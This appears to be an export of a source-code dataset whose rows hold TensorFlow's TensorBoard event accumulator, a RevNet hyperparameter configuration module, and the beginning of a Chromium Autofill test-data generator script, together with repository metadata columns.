repo_name
stringlengths 5
100
| path
stringlengths 4
299
| copies
stringclasses 990
values | size
stringlengths 4
7
| content
stringlengths 666
1.03M
| license
stringclasses 15
values | hash
int64 -9,223,351,895,964,839,000
9,223,297,778B
| line_mean
float64 3.17
100
| line_max
int64 7
1k
| alpha_frac
float64 0.25
0.98
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
sugartom/tensorflow-alien | tensorflow/tensorboard/backend/event_processing/event_accumulator.py | 2 | 30610 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Takes a generator of values, and accumulates them for a frontend."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import re
import threading
import numpy as np
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import meta_graph_pb2
from tensorflow.core.protobuf.config_pb2 import RunMetadata
from tensorflow.core.util.event_pb2 import SessionLog
from tensorflow.python.framework import tensor_util
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import compat
from tensorflow.tensorboard.backend.event_processing import directory_watcher
from tensorflow.tensorboard.backend.event_processing import event_file_loader
from tensorflow.tensorboard.backend.event_processing import reservoir
namedtuple = collections.namedtuple
ScalarEvent = namedtuple('ScalarEvent', ['wall_time', 'step', 'value'])
HealthPillEvent = namedtuple(
'HealthPillEvent',
['wall_time', 'step', 'node_name', 'output_slot', 'value'])
CompressedHistogramEvent = namedtuple('CompressedHistogramEvent',
['wall_time', 'step',
'compressed_histogram_values'])
CompressedHistogramValue = namedtuple('CompressedHistogramValue',
['basis_point', 'value'])
HistogramEvent = namedtuple('HistogramEvent',
['wall_time', 'step', 'histogram_value'])
HistogramValue = namedtuple('HistogramValue', ['min', 'max', 'num', 'sum',
'sum_squares', 'bucket_limit',
'bucket'])
ImageEvent = namedtuple('ImageEvent', ['wall_time', 'step',
'encoded_image_string', 'width',
'height'])
AudioEvent = namedtuple('AudioEvent', ['wall_time', 'step',
'encoded_audio_string', 'content_type',
'sample_rate', 'length_frames'])
TensorEvent = namedtuple('TensorEvent', ['wall_time', 'step', 'tensor_proto'])
## Different types of summary events handled by the event_accumulator
SUMMARY_TYPES = {
'simple_value': '_ProcessScalar',
'histo': '_ProcessHistogram',
'image': '_ProcessImage',
'audio': '_ProcessAudio',
'tensor': '_ProcessTensor',
}
## The tagTypes below are just arbitrary strings chosen to pass the type
## information of the tag from the backend to the frontend
COMPRESSED_HISTOGRAMS = 'compressedHistograms'
HISTOGRAMS = 'histograms'
IMAGES = 'images'
AUDIO = 'audio'
SCALARS = 'scalars'
TENSORS = 'tensors'
HEALTH_PILLS = 'health_pills'
GRAPH = 'graph'
META_GRAPH = 'meta_graph'
RUN_METADATA = 'run_metadata'
## Normal CDF for std_devs: (-Inf, -1.5, -1, -0.5, 0, 0.5, 1, 1.5, Inf)
## naturally gives bands around median of width 1 std dev, 2 std dev, 3 std dev,
## and then the long tail.
NORMAL_HISTOGRAM_BPS = (0, 668, 1587, 3085, 5000, 6915, 8413, 9332, 10000)
DEFAULT_SIZE_GUIDANCE = {
COMPRESSED_HISTOGRAMS: 500,
IMAGES: 4,
AUDIO: 4,
SCALARS: 10000,
# We store this many health pills per op.
HEALTH_PILLS: 100,
HISTOGRAMS: 1,
TENSORS: 10,
}
STORE_EVERYTHING_SIZE_GUIDANCE = {
COMPRESSED_HISTOGRAMS: 0,
IMAGES: 0,
AUDIO: 0,
SCALARS: 0,
HEALTH_PILLS: 0,
HISTOGRAMS: 0,
TENSORS: 0,
}
# The tag that values containing health pills have. Health pill data is stored
# in tensors. In order to distinguish health pill values from scalar values, we
# rely on how health pill values have this special tag value.
HEALTH_PILL_EVENT_TAG = '__health_pill__'
def IsTensorFlowEventsFile(path):
"""Check the path name to see if it is probably a TF Events file.
Args:
path: A file path to check if it is an event file.
Raises:
ValueError: If the path is an empty string.
Returns:
If path is formatted like a TensorFlowEventsFile.
"""
if not path:
raise ValueError('Path must be a nonempty string')
return 'tfevents' in compat.as_str_any(os.path.basename(path))
class EventAccumulator(object):
"""An `EventAccumulator` takes an event generator, and accumulates the values.
The `EventAccumulator` is intended to provide a convenient Python interface
for loading Event data written during a TensorFlow run. TensorFlow writes out
`Event` protobuf objects, which have a timestamp and step number, and often
contain a `Summary`. Summaries can have different kinds of data like an image,
a scalar value, or a histogram. The Summaries also have a tag, which we use to
organize logically related data. The `EventAccumulator` supports retrieving
the `Event` and `Summary` data by its tag.
Calling `Tags()` gets a map from `tagType` (e.g. `'images'`,
`'compressedHistograms'`, `'scalars'`, etc) to the associated tags for those
data types. Then, various functional endpoints (eg
`Accumulator.Scalars(tag)`) allow for the retrieval of all data
associated with that tag.
The `Reload()` method synchronously loads all of the data written so far.
Histograms, audio, and images are very large, so storing all of them is not
recommended.
@@Tensors
"""
def __init__(self,
path,
size_guidance=DEFAULT_SIZE_GUIDANCE,
compression_bps=NORMAL_HISTOGRAM_BPS,
purge_orphaned_data=True):
"""Construct the `EventAccumulator`.
Args:
path: A file path to a directory containing tf events files, or a single
tf events file. The accumulator will load events from this path.
size_guidance: Information on how much data the EventAccumulator should
store in memory. The DEFAULT_SIZE_GUIDANCE tries not to store too much
so as to avoid OOMing the client. The size_guidance should be a map
from a `tagType` string to an integer representing the number of
items to keep per tag for items of that `tagType`. If the size is 0,
all events are stored.
compression_bps: Information on how the `EventAccumulator` should compress
histogram data for the `CompressedHistograms` tag (for details see
`ProcessCompressedHistogram`).
purge_orphaned_data: Whether to discard any events that were "orphaned" by
a TensorFlow restart.
"""
sizes = {}
for key in DEFAULT_SIZE_GUIDANCE:
if key in size_guidance:
sizes[key] = size_guidance[key]
else:
sizes[key] = DEFAULT_SIZE_GUIDANCE[key]
self._first_event_timestamp = None
self._scalars = reservoir.Reservoir(size=sizes[SCALARS])
# Unlike the other reservoir, the reservoir for health pills is keyed by the
# name of the op instead of the tag. This lets us efficiently obtain the
# health pills per node.
self._health_pills = reservoir.Reservoir(size=sizes[HEALTH_PILLS])
self._graph = None
self._graph_from_metagraph = False
self._meta_graph = None
self._tagged_metadata = {}
self._histograms = reservoir.Reservoir(size=sizes[HISTOGRAMS])
self._compressed_histograms = reservoir.Reservoir(
size=sizes[COMPRESSED_HISTOGRAMS], always_keep_last=False)
self._images = reservoir.Reservoir(size=sizes[IMAGES])
self._audio = reservoir.Reservoir(size=sizes[AUDIO])
self._tensors = reservoir.Reservoir(size=sizes[TENSORS])
self._generator_mutex = threading.Lock()
self._generator = _GeneratorFromPath(path)
self._compression_bps = compression_bps
self.purge_orphaned_data = purge_orphaned_data
self.most_recent_step = -1
self.most_recent_wall_time = -1
self.file_version = None
# The attributes that get built up by the accumulator
self.accumulated_attrs = ('_scalars', '_histograms',
'_compressed_histograms', '_images', '_audio')
self._tensor_summaries = {}
def Reload(self):
"""Loads all events added since the last call to `Reload`.
If `Reload` was never called, loads all events in the file.
Returns:
The `EventAccumulator`.
"""
with self._generator_mutex:
for event in self._generator.Load():
self._ProcessEvent(event)
return self
def FirstEventTimestamp(self):
"""Returns the timestamp in seconds of the first event.
If the first event has been loaded (either by this method or by `Reload`,
this returns immediately. Otherwise, it will load in the first event. Note
that this means that calling `Reload` will cause this to block until
`Reload` has finished.
Returns:
The timestamp in seconds of the first event that was loaded.
Raises:
ValueError: If no events have been loaded and there were no events found
on disk.
"""
if self._first_event_timestamp is not None:
return self._first_event_timestamp
with self._generator_mutex:
try:
event = next(self._generator.Load())
self._ProcessEvent(event)
return self._first_event_timestamp
except StopIteration:
raise ValueError('No event timestamp could be found')
def _ProcessEvent(self, event):
"""Called whenever an event is loaded."""
if self._first_event_timestamp is None:
self._first_event_timestamp = event.wall_time
if event.HasField('file_version'):
new_file_version = _ParseFileVersion(event.file_version)
if self.file_version and self.file_version != new_file_version:
## This should not happen.
logging.warn(('Found new file_version for event.proto. This will '
'affect purging logic for TensorFlow restarts. '
'Old: {0} New: {1}').format(self.file_version,
new_file_version))
self.file_version = new_file_version
self._MaybePurgeOrphanedData(event)
## Process the event.
# GraphDef and MetaGraphDef are handled in a special way:
# If no graph_def Event is available, but a meta_graph_def is, and it
# contains a graph_def, then use the meta_graph_def.graph_def as our graph.
# If a graph_def Event is available, always prefer it to the graph_def
# inside the meta_graph_def.
if event.HasField('graph_def'):
if self._graph is not None:
logging.warn(('Found more than one graph event per run, or there was '
'a metagraph containing a graph_def, as well as one or '
'more graph events. Overwriting the graph with the '
'newest event.'))
self._graph = event.graph_def
self._graph_from_metagraph = False
elif event.HasField('meta_graph_def'):
if self._meta_graph is not None:
logging.warn(('Found more than one metagraph event per run. '
'Overwriting the metagraph with the newest event.'))
self._meta_graph = event.meta_graph_def
if self._graph is None or self._graph_from_metagraph:
# We may have a graph_def in the metagraph. If so, and no
# graph_def is directly available, use this one instead.
meta_graph = meta_graph_pb2.MetaGraphDef()
meta_graph.ParseFromString(self._meta_graph)
if meta_graph.graph_def:
if self._graph is not None:
logging.warn(('Found multiple metagraphs containing graph_defs,'
'but did not find any graph events. Overwriting the '
'graph with the newest metagraph version.'))
self._graph_from_metagraph = True
self._graph = meta_graph.graph_def.SerializeToString()
elif event.HasField('tagged_run_metadata'):
tag = event.tagged_run_metadata.tag
if tag in self._tagged_metadata:
logging.warn('Found more than one "run metadata" event with tag ' +
tag + '. Overwriting it with the newest event.')
self._tagged_metadata[tag] = event.tagged_run_metadata.run_metadata
elif event.HasField('summary'):
for value in event.summary.value:
if value.HasField('tensor') and value.tag == HEALTH_PILL_EVENT_TAG:
self._ProcessHealthPillSummary(value, event)
else:
for summary_type, summary_func in SUMMARY_TYPES.items():
if value.HasField(summary_type):
datum = getattr(value, summary_type)
tag = value.node_name if summary_type == 'tensor' else value.tag
getattr(self, summary_func)(tag, event.wall_time, event.step,
datum)
def _ProcessHealthPillSummary(self, value, event):
"""Process summaries containing health pills.
These summaries are distinguished by the fact that they have a Tensor field
and have a special tag value.
This method emits ERROR-level messages to the logs if it encounters Tensor
summaries that it cannot process.
Args:
value: A summary_pb2.Summary.Value with a Tensor field.
event: The event_pb2.Event containing that value.
"""
elements = tensor_util.MakeNdarray(value.tensor)
# The node_name property of the value object is actually a watch key: a
# combination of node name, output slot, and a suffix. We capture the
# actual node name and the output slot with a regular expression.
match = re.match(r'^(.*):(\d+):DebugNumericSummary$', value.node_name)
if not match:
logging.log_first_n(
logging.ERROR,
'Unsupported watch key %s for health pills; skipping this sequence.',
1,
value.node_name)
return
node_name = match.group(1)
output_slot = int(match.group(2))
self._ProcessHealthPill(
event.wall_time, event.step, node_name, output_slot, elements)
def Tags(self):
"""Return all tags found in the value stream.
Returns:
A `{tagType: ['list', 'of', 'tags']}` dictionary.
"""
return {
IMAGES: self._images.Keys(),
AUDIO: self._audio.Keys(),
HISTOGRAMS: self._histograms.Keys(),
SCALARS: self._scalars.Keys(),
COMPRESSED_HISTOGRAMS: self._compressed_histograms.Keys(),
TENSORS: self._tensors.Keys(),
# Use a heuristic: if the metagraph is available, but
# graph is not, then we assume the metagraph contains the graph.
GRAPH: self._graph is not None,
META_GRAPH: self._meta_graph is not None,
RUN_METADATA: list(self._tagged_metadata.keys())
}
def Scalars(self, tag):
"""Given a summary tag, return all associated `ScalarEvent`s.
Args:
tag: A string tag associated with the events.
Raises:
KeyError: If the tag is not found.
Returns:
An array of `ScalarEvent`s.
"""
return self._scalars.Items(tag)
def HealthPills(self, node_name):
"""Returns all health pill values for a certain node.
Args:
node_name: The name of the node to obtain health pills for.
Raises:
KeyError: If the node name is not found.
Returns:
An array of `HealthPillEvent`s.
"""
return self._health_pills.Items(node_name)
def Graph(self):
"""Return the graph definition, if there is one.
If the graph is stored directly, return that. If no graph is stored
directly but a metagraph is stored containing a graph, return that.
Raises:
ValueError: If there is no graph for this run.
Returns:
The `graph_def` proto.
"""
graph = graph_pb2.GraphDef()
if self._graph is not None:
graph.ParseFromString(self._graph)
return graph
raise ValueError('There is no graph in this EventAccumulator')
def MetaGraph(self):
"""Return the metagraph definition, if there is one.
Raises:
ValueError: If there is no metagraph for this run.
Returns:
The `meta_graph_def` proto.
"""
if self._meta_graph is None:
raise ValueError('There is no metagraph in this EventAccumulator')
meta_graph = meta_graph_pb2.MetaGraphDef()
meta_graph.ParseFromString(self._meta_graph)
return meta_graph
def RunMetadata(self, tag):
"""Given a tag, return the associated session.run() metadata.
Args:
tag: A string tag associated with the event.
Raises:
ValueError: If the tag is not found.
Returns:
The metadata in form of `RunMetadata` proto.
"""
if tag not in self._tagged_metadata:
raise ValueError('There is no run metadata with this tag name')
run_metadata = RunMetadata()
run_metadata.ParseFromString(self._tagged_metadata[tag])
return run_metadata
def Histograms(self, tag):
"""Given a summary tag, return all associated histograms.
Args:
tag: A string tag associated with the events.
Raises:
KeyError: If the tag is not found.
Returns:
An array of `HistogramEvent`s.
"""
return self._histograms.Items(tag)
def CompressedHistograms(self, tag):
"""Given a summary tag, return all associated compressed histograms.
Args:
tag: A string tag associated with the events.
Raises:
KeyError: If the tag is not found.
Returns:
An array of `CompressedHistogramEvent`s.
"""
return self._compressed_histograms.Items(tag)
def Images(self, tag):
"""Given a summary tag, return all associated images.
Args:
tag: A string tag associated with the events.
Raises:
KeyError: If the tag is not found.
Returns:
An array of `ImageEvent`s.
"""
return self._images.Items(tag)
def Audio(self, tag):
"""Given a summary tag, return all associated audio.
Args:
tag: A string tag associated with the events.
Raises:
KeyError: If the tag is not found.
Returns:
An array of `AudioEvent`s.
"""
return self._audio.Items(tag)
def Tensors(self, tag):
"""Given a summary tag, return all associated tensors.
Args:
tag: A string tag associated with the events.
Raises:
KeyError: If the tag is not found.
Returns:
An array of `TensorEvent`s.
"""
return self._tensors.Items(tag)
def _MaybePurgeOrphanedData(self, event):
"""Maybe purge orphaned data due to a TensorFlow crash.
When TensorFlow crashes at step T+O and restarts at step T, any events
written after step T are now "orphaned" and will be at best misleading if
they are included in TensorBoard.
This logic attempts to determine if there is orphaned data, and purge it
if it is found.
Args:
event: The event to use as a reference, to determine if a purge is needed.
"""
if not self.purge_orphaned_data:
return
## Check if the event happened after a crash, and purge expired tags.
if self.file_version and self.file_version >= 2:
## If the file_version is recent enough, use the SessionLog enum
## to check for restarts.
self._CheckForRestartAndMaybePurge(event)
else:
## If there is no file version, default to old logic of checking for
## out of order steps.
self._CheckForOutOfOrderStepAndMaybePurge(event)
def _CheckForRestartAndMaybePurge(self, event):
"""Check and discard expired events using SessionLog.START.
Check for a SessionLog.START event and purge all previously seen events
with larger steps, because they are out of date. Because of supervisor
threading, it is possible that this logic will cause the first few event
messages to be discarded since supervisor threading does not guarantee
that the START message is deterministically written first.
This method is preferred over _CheckForOutOfOrderStepAndMaybePurge which
can inadvertently discard events due to supervisor threading.
Args:
event: The event to use as reference. If the event is a START event, all
previously seen events with a greater event.step will be purged.
"""
if event.HasField(
'session_log') and event.session_log.status == SessionLog.START:
self._Purge(event, by_tags=False)
def _CheckForOutOfOrderStepAndMaybePurge(self, event):
"""Check for out-of-order event.step and discard expired events for tags.
Check if the event is out of order relative to the global most recent step.
If it is, purge outdated summaries for tags that the event contains.
Args:
event: The event to use as reference. If the event is out-of-order, all
events with the same tags, but with a greater event.step will be purged.
"""
if event.step < self.most_recent_step and event.HasField('summary'):
self._Purge(event, by_tags=True)
else:
self.most_recent_step = event.step
self.most_recent_wall_time = event.wall_time
def _ConvertHistogramProtoToTuple(self, histo):
return HistogramValue(min=histo.min,
max=histo.max,
num=histo.num,
sum=histo.sum,
sum_squares=histo.sum_squares,
bucket_limit=list(histo.bucket_limit),
bucket=list(histo.bucket))
def _ProcessHistogram(self, tag, wall_time, step, histo):
"""Processes a proto histogram by adding it to accumulated state."""
histo = self._ConvertHistogramProtoToTuple(histo)
histo_ev = HistogramEvent(wall_time, step, histo)
self._histograms.AddItem(tag, histo_ev)
self._compressed_histograms.AddItem(
tag, histo_ev, lambda x: _CompressHistogram(x, self._compression_bps))
def _ProcessImage(self, tag, wall_time, step, image):
"""Processes an image by adding it to accumulated state."""
event = ImageEvent(wall_time=wall_time,
step=step,
encoded_image_string=image.encoded_image_string,
width=image.width,
height=image.height)
self._images.AddItem(tag, event)
def _ProcessAudio(self, tag, wall_time, step, audio):
"""Processes a audio by adding it to accumulated state."""
event = AudioEvent(wall_time=wall_time,
step=step,
encoded_audio_string=audio.encoded_audio_string,
content_type=audio.content_type,
sample_rate=audio.sample_rate,
length_frames=audio.length_frames)
self._audio.AddItem(tag, event)
def _ProcessScalar(self, tag, wall_time, step, scalar):
"""Processes a simple value by adding it to accumulated state."""
sv = ScalarEvent(wall_time=wall_time, step=step, value=scalar)
self._scalars.AddItem(tag, sv)
def _ProcessTensor(self, tag, wall_time, step, tensor):
tv = TensorEvent(wall_time=wall_time, step=step, tensor_proto=tensor)
self._tensors.AddItem(tag, tv)
def _ProcessHealthPill(self, wall_time, step, node_name, output_slot,
elements):
"""Processes a health pill value by adding it to accumulated state.
Args:
wall_time: The time at which the health pill was created. Provided by the
debugger.
step: The step at which the health pill was created. Provided by the
debugger.
node_name: The name of the node for this health pill.
output_slot: The output slot for this health pill.
elements: An ND array of 12 floats. The elements of the health pill.
"""
# Key by the node name for fast retrieval of health pills by node name. The
# array is cast to a list so that it is JSON-able. The debugger data plugin
# serves a JSON response.
self._health_pills.AddItem(
node_name,
HealthPillEvent(
wall_time=wall_time,
step=step,
node_name=node_name,
output_slot=output_slot,
value=list(elements)))
def _Purge(self, event, by_tags):
"""Purge all events that have occurred after the given event.step.
If by_tags is True, purge all events that occurred after the given
event.step, but only for the tags that the event has. Non-sequential
event.steps suggest that a TensorFlow restart occurred, and we discard
the out-of-order events to display a consistent view in TensorBoard.
Discarding by tags is the safer method, when we are unsure whether a restart
has occurred, given that threading in supervisor can cause events of
different tags to arrive with unsynchronized step values.
If by_tags is False, then purge all events with event.step greater than the
given event.step. This can be used when we are certain that a TensorFlow
restart has occurred and these events can be discarded.
Args:
event: The event to use as reference for the purge. All events with
the same tags, but with a greater event.step will be purged.
by_tags: Bool to dictate whether to discard all out-of-order events or
only those that are associated with the given reference event.
"""
## Keep data in reservoirs that has a step less than event.step
_NotExpired = lambda x: x.step < event.step
if by_tags:
def _ExpiredPerTag(value):
return [getattr(self, x).FilterItems(_NotExpired, value.tag)
for x in self.accumulated_attrs]
expired_per_tags = [_ExpiredPerTag(value)
for value in event.summary.value]
expired_per_type = [sum(x) for x in zip(*expired_per_tags)]
else:
expired_per_type = [getattr(self, x).FilterItems(_NotExpired)
for x in self.accumulated_attrs]
if sum(expired_per_type) > 0:
purge_msg = _GetPurgeMessage(self.most_recent_step,
self.most_recent_wall_time, event.step,
event.wall_time, *expired_per_type)
logging.warn(purge_msg)
def _GetPurgeMessage(most_recent_step, most_recent_wall_time, event_step,
event_wall_time, num_expired_scalars, num_expired_histos,
num_expired_comp_histos, num_expired_images,
num_expired_audio):
"""Return the string message associated with TensorBoard purges."""
return ('Detected out of order event.step likely caused by '
'a TensorFlow restart. Purging expired events from Tensorboard'
' display between the previous step: {} (timestamp: {}) and '
'current step: {} (timestamp: {}). Removing {} scalars, {} '
'histograms, {} compressed histograms, {} images, '
'and {} audio.').format(most_recent_step, most_recent_wall_time,
event_step, event_wall_time,
num_expired_scalars, num_expired_histos,
num_expired_comp_histos, num_expired_images,
num_expired_audio)
def _GeneratorFromPath(path):
"""Create an event generator for file or directory at given path string."""
if not path:
raise ValueError('path must be a valid string')
if IsTensorFlowEventsFile(path):
return event_file_loader.EventFileLoader(path)
else:
return directory_watcher.DirectoryWatcher(
path, event_file_loader.EventFileLoader, IsTensorFlowEventsFile)
def _ParseFileVersion(file_version):
"""Convert the string file_version in event.proto into a float.
Args:
file_version: String file_version from event.proto
Returns:
Version number as a float.
"""
tokens = file_version.split('brain.Event:')
try:
return float(tokens[-1])
except ValueError:
## This should never happen according to the definition of file_version
## specified in event.proto.
logging.warn(('Invalid event.proto file_version. Defaulting to use of '
'out-of-order event.step logic for purging expired events.'))
return -1
def _CompressHistogram(histo_ev, bps):
"""Creates fixed size histogram by adding compression to accumulated state.
This routine transforms a histogram at a particular step by linearly
interpolating its variable number of buckets to represent their cumulative
weight at a constant number of compression points. This significantly reduces
the size of the histogram and makes it suitable for a two-dimensional area
plot where the output of this routine constitutes the ranges for a single x
coordinate.
Args:
histo_ev: A HistogramEvent namedtuple.
bps: Compression points represented in basis points, 1/100ths of a percent.
Returns:
CompressedHistogramEvent namedtuple.
"""
# See also: Histogram::Percentile() in core/lib/histogram/histogram.cc
histo = histo_ev.histogram_value
if not histo.num:
return CompressedHistogramEvent(
histo_ev.wall_time,
histo_ev.step,
[CompressedHistogramValue(b, 0.0) for b in bps])
bucket = np.array(histo.bucket)
weights = (bucket * bps[-1] / (bucket.sum() or 1.0)).cumsum()
values = []
j = 0
while j < len(bps):
i = np.searchsorted(weights, bps[j], side='right')
while i < len(weights):
cumsum = weights[i]
cumsum_prev = weights[i - 1] if i > 0 else 0.0
if cumsum == cumsum_prev: # prevent remap divide by zero
i += 1
continue
if not i or not cumsum_prev:
lhs = histo.min
else:
lhs = max(histo.bucket_limit[i - 1], histo.min)
rhs = min(histo.bucket_limit[i], histo.max)
weight = _Remap(bps[j], cumsum_prev, cumsum, lhs, rhs)
values.append(CompressedHistogramValue(bps[j], weight))
j += 1
break
else:
break
while j < len(bps):
values.append(CompressedHistogramValue(bps[j], histo.max))
j += 1
return CompressedHistogramEvent(histo_ev.wall_time, histo_ev.step, values)
def _Remap(x, x0, x1, y0, y1):
"""Linearly map from [x0, x1] unto [y0, y1]."""
return y0 + (x - x0) * float(y1 - y0) / (x1 - x0)
| apache-2.0 | -567,571,839,064,674,750 | 36.650677 | 80 | 0.655995 | false |
dongjoon-hyun/tensorflow | tensorflow/contrib/eager/python/examples/revnet/config.py | 28 | 6581 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Reversible residual network compatible with eager execution.
Configuration in format of tf.contrib.training.HParams.
Supports CIFAR-10, CIFAR-100, and ImageNet datasets.
Reference [The Reversible Residual Network: Backpropagation
Without Storing Activations](https://arxiv.org/pdf/1707.04585.pdf)
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
def get_hparams_cifar_38():
"""RevNet-38 configurations for CIFAR-10/CIFAR-100."""
config = tf.contrib.training.HParams()
config.add_hparam("num_train_images", 50000)
config.add_hparam("num_eval_images", 10000)
config.add_hparam("init_filters", 32)
config.add_hparam("init_kernel", 3)
config.add_hparam("init_stride", 1)
config.add_hparam("n_rev_blocks", 3)
config.add_hparam("n_res", [3, 3, 3])
config.add_hparam("filters", [32, 64, 112])
config.add_hparam("strides", [1, 2, 2])
config.add_hparam("batch_size", 100)
config.add_hparam("bottleneck", False)
config.add_hparam("fused", True)
config.add_hparam("init_max_pool", False)
if tf.test.is_gpu_available():
config.add_hparam("input_shape", (3, 32, 32))
config.add_hparam("data_format", "channels_first")
else:
config.add_hparam("input_shape", (32, 32, 3))
config.add_hparam("data_format", "channels_last")
# Training details
config.add_hparam("weight_decay", 2e-4)
config.add_hparam("momentum", .9)
config.add_hparam("lr_decay_steps", [40000, 60000])
config.add_hparam("lr_list", [1e-1, 1e-2, 1e-3])
config.add_hparam("max_train_iter", 80000)
config.add_hparam("seed", 1234)
config.add_hparam("shuffle", True)
config.add_hparam("log_every", 500)
config.add_hparam("save_every", 500)
config.add_hparam("dtype", tf.float32)
config.add_hparam("eval_batch_size", 1000)
config.add_hparam("div255", True)
# This is imprecise, when training with validation set,
# we only have 40k images in training data
config.add_hparam("iters_per_epoch",
config.num_train_images // config.batch_size)
config.add_hparam("epochs", config.max_train_iter // config.iters_per_epoch)
# Customized TPU hyperparameters due to differing batch size caused by
# TPU architecture specifics
# Suggested batch sizes to reduce overhead from excessive tensor padding
# https://cloud.google.com/tpu/docs/troubleshooting
config.add_hparam("tpu_batch_size", 1024)
config.add_hparam("tpu_eval_batch_size", 1024)
config.add_hparam("tpu_iters_per_epoch",
config.num_train_images // config.tpu_batch_size)
config.add_hparam("tpu_epochs",
config.max_train_iter // config.tpu_iters_per_epoch)
config.add_hparam("tpu_eval_steps",
config.num_eval_images // config.tpu_eval_batch_size)
return config
def get_hparams_cifar_110():
config = get_hparams_cifar_38()
config.filters = [32, 64, 128]
config.n_res = [9, 9, 9]
return config
def get_hparams_cifar_164():
config = get_hparams_cifar_38()
config.filters = [32, 64, 128]
config.n_res = [9, 9, 9]
config.use_bottleneck = True
# Due to bottleneck residual blocks
filters = [f * 4 for f in config.filters]
config.filters = filters
return config
def get_hparams_imagenet_56():
"""RevNet-56 configurations for ImageNet."""
config = tf.contrib.training.HParams()
config.add_hparam("n_classes", 1000)
config.add_hparam("dataset", "ImageNet")
config.add_hparam("num_train_images", 1281167)
config.add_hparam("num_eval_images", 50000)
config.add_hparam("init_filters", 128)
config.add_hparam("init_kernel", 7)
config.add_hparam("init_stride", 2)
config.add_hparam("n_rev_blocks", 4)
config.add_hparam("n_res", [2, 2, 2, 2])
config.add_hparam("filters", [128, 256, 512, 832])
config.add_hparam("strides", [1, 2, 2, 2])
config.add_hparam("batch_size", 256)
config.add_hparam("bottleneck", True)
config.add_hparam("fused", True)
config.add_hparam("init_max_pool", True)
if tf.test.is_gpu_available():
config.add_hparam("input_shape", (3, 224, 224))
config.add_hparam("data_format", "channels_first")
else:
config.add_hparam("input_shape", (224, 224, 3))
config.add_hparam("data_format", "channels_last")
# Due to bottleneck residual blocks
filters = [f * 4 for f in config.filters]
config.filters = filters
# Training details
config.add_hparam("weight_decay", 1e-4)
config.add_hparam("momentum", .9)
config.add_hparam("lr_decay_steps", [160000, 320000, 480000])
config.add_hparam("lr_list", [1e-1, 1e-2, 1e-3, 1e-4])
config.add_hparam("max_train_iter", 600000)
config.add_hparam("seed", 1234)
config.add_hparam("shuffle", True)
config.add_hparam("log_every", 500)
config.add_hparam("save_every", 500)
config.add_hparam("dtype", tf.float32)
config.add_hparam("eval_batch_size", 256)
config.add_hparam("div255", True)
config.add_hparam("iters_per_epoch",
config.num_train_images // config.batch_size)
config.add_hparam("epochs", config.max_train_iter // config.iters_per_epoch)
# Customized TPU hyperparameters due to differing batch size caused by
# TPU architecture specifics
# Suggested batch sizes to reduce overhead from excessive tensor padding
# https://cloud.google.com/tpu/docs/troubleshooting
config.add_hparam("tpu_batch_size", 1024)
config.add_hparam("tpu_eval_batch_size", 1024)
config.add_hparam("tpu_iters_per_epoch",
config.num_train_images // config.tpu_batch_size)
config.add_hparam("tpu_epochs",
config.max_train_iter // config.tpu_iters_per_epoch)
config.add_hparam("tpu_eval_steps",
config.num_eval_images // config.tpu_eval_batch_size)
return config
def get_hparams_imagenet_104():
config = get_hparams_imagenet_56()
config.n_res = [2, 2, 11, 2]
return config
| apache-2.0 | -1,620,045,647,634,723,800 | 36.605714 | 80 | 0.684546 | false |
Crystalnix/BitPop | chrome/test/functional/autofill_dataset_generator.py | 11 | 9785 | #!/usr/bin/env python
# Copyright (c) 2011 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Generates profile dictionaries for Autofill.
Used to test autofill.AutofillTest.FormFillLatencyAfterSubmit.
Can be used as a stand alone script with -h to print out help text by running:
python autofill_dataset_generator.py -h
"""
import codecs
import logging
from optparse import OptionParser
import os
import random
import re
import sys
class NullHandler(logging.Handler):
def emit(self, record):
pass
class DatasetGenerator(object):
"""Generates a dataset of dictionaries.
The lists (such as address_construct, city_construct) define the way the
corresponding field is generated. They accomplish this by specifying a
list of function-args lists.
"""
address_construct = [
[ random.randint, 1, 10000],
[ None, u'foobar'],
[ random.choice, [ u'St', u'Ave', u'Ln', u'Ct', ]],
[ random.choice, [ u'#1', u'#2', u'#3', ]],
]
city_construct = [
[ random.choice, [ u'San Jose', u'San Francisco', u'Sacramento',
u'Los Angeles', ]],
]
state_construct = [
[ None, u'CA']
]
# These zip codes are now matched to the corresponding cities in
# city_construct.
zip_construct = [ u'95110', u'94109', u'94203', u'90120']
logger = logging.getLogger(__name__)
logger.addHandler(NullHandler())
log_handlers = {'StreamHandler': None}
def __init__(self, output_filename=None, logging_level=None):
"""Constructs dataset generator object.
Creates 'fields' data member which is a list of pair (two values) lists.
These pairs are comprised of a field key e.g. u'NAME_FIRST' and a
generator method e.g. self.GenerateNameFirst which will generate the value.
If we want the value to always be the same e.g. u'John' we can use this
instead of a method. We can even use None keyword which will give
a value of u''.
'output_pattern' for one field would have been: "{u'NAME_FIRST': u'%s',}"
which is ready to accept a value for the 'NAME_FIRST' field key once
this value is generated.
'output_pattern' is used in 'GenerateNextDict()' to generate the next
dict line.
Args:
output_filename: specified filename of generated dataset to be saved.
Default value is None and no saving takes place.
logging_level: set verbosity levels, default is None.
"""
if logging_level:
if not self.log_handlers['StreamHandler']:
console = logging.StreamHandler()
console.setLevel(logging.INFO)
self.log_handlers['StreamHandler'] = console
self.logger.addHandler(console)
self.logger.setLevel(logging_level)
else:
if self.log_handlers['StreamHandler']:
